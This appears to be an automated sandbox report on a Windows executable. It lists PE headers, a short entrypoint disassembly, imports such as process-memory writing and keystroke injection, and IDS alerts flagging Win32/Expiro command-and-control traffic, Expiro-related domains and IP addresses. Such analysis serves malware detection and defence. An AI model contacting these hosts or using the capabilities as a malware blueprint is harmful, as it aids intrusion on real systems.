                                                                                                                                                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                                                              Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                                                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                              Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                                                                                                                                                                              call 00007FA30127B12Ch
                                                                                                                                                                                                                                                                                                                                                                                                              jmp 00007FA30126EEFEh
                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                                                                                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                                                                                                                              mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                                                                                                                                                                                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                                                                                                                                                                                                                                                              mov edx, ecx
                                                                                                                                                                                                                                                                                                                                                                                                              add eax, esi
                                                                                                                                                                                                                                                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                                                                                                                                                                                                                                                              jbe 00007FA30126F08Ah
                                                                                                                                                                                                                                                                                                                                                                                                              cmp edi, eax
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F22Ah
                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 00000100h
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F0A1h
                                                                                                                                                                                                                                                                                                                                                                                                              cmp dword ptr [004A94E0h], 00000000h
                                                                                                                                                                                                                                                                                                                                                                                                              je 00007FA30126F098h
                                                                                                                                                                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                                                                                                                                                                              and edi, 0Fh
                                                                                                                                                                                                                                                                                                                                                                                                              and esi, 0Fh
                                                                                                                                                                                                                                                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                                                                                                                                                                                                              jne 00007FA30126F08Ah
                                                                                                                                                                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                                                                                                                                                                                                                              jmp 00007FA30126F4EAh
                                                                                                                                                                                                                                                                                                                                                                                                              test edi, 00000003h
                                                                                                                                                                                                                                                                                                                                                                                                              jne 00007FA30126F097h
                                                                                                                                                                                                                                                                                                                                                                                                              shr ecx, 02h
                                                                                                                                                                                                                                                                                                                                                                                                              and edx, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F0ACh
                                                                                                                                                                                                                                                                                                                                                                                                              rep movsd
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00416494h+edx*4]
                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                                                                                                                                                                              mov edx, 00000003h
                                                                                                                                                                                                                                                                                                                                                                                                              sub ecx, 04h
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F08Eh
                                                                                                                                                                                                                                                                                                                                                                                                              and eax, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              add ecx, eax
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [004163A8h+eax*4]
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [004164A4h+ecx*4]
                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00416428h+ecx*4]
                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                              mov eax, E4004163h
                                                                                                                                                                                                                                                                                                                                                                                                              arpl word ptr [ecx+00h], ax
                                                                                                                                                                                                                                                                                                                                                                                                              or byte ptr [ecx+eax*2+00h], ah
                                                                                                                                                                                                                                                                                                                                                                                                              and edx, ecx
                                                                                                                                                                                                                                                                                                                                                                                                              mov al, byte ptr [esi]
                                                                                                                                                                                                                                                                                                                                                                                                              mov byte ptr [edi], al
                                                                                                                                                                                                                                                                                                                                                                                                              mov al, byte ptr [esi+01h]
                                                                                                                                                                                                                                                                                                                                                                                                              mov byte ptr [edi+01h], al
                                                                                                                                                                                                                                                                                                                                                                                                              mov al, byte ptr [esi+02h]
                                                                                                                                                                                                                                                                                                                                                                                                              shr ecx, 02h
                                                                                                                                                                                                                                                                                                                                                                                                              mov byte ptr [edi+02h], al
                                                                                                                                                                                                                                                                                                                                                                                                              add esi, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              add edi, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F04Eh

                                                                                                                                                                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                                                                                                                                                                              • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                                                                                                              • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                                                                                                              • [ C ] VS2005 build 50727
                                                                                                                                                                                                                                                                                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                                                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                                                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                                                                                                                                                              • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                                                                                              .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                              .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                              .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                                                                              .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                                                                                                                                                                                                                                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                                                                                                                                                                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                                                                                                                              RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                                                                                                                              RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                                                                                                                                                                                                                                                              RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                                                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                                                                                                                                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                                                                                                                                                                                                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                                                                                                                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                                                                                                                                                                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                                                                                                                                                                                                                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                                                                                                                                                                                                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                                                                                                                                                                                                                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                                                                                                                                                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                                                                                                                                                                                                                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                                                                                                                                                                                                                                                                                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                                                                                                                                                                                                                                                                                                              GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                                                                                                                                                                                                                                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                                                                                                                                                                                                                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                                                                                                                                                                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                                                                                                                                                                                                                                                                                                              OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                                                                                                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                                                                                              EnglishGreat Britain
                                                                                                                                                                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:53.521181+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549706TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:53.521181+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.549706TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:54.601386+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549710TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:54.601386+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549710TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:56.050638+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5555751.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:57.035218+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.559392TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:57.035218+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.559392TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:57.087877+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5503571.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:57.456122+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5511971.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:58.582766+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.559396172.234.222.13880TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:02:58.738163+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5541471.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:02.887458+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.559401TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:17.701232+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.559491TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:17.701232+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.559491TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:19.520664+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.559498TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:19.520664+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.559498TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:26.271989+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.559538TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:26.271989+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.559538TCP
                                                                                                                                                                                                                                                                                                                                                                                                              2024-11-05T17:03:27.269331+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.559550TCP
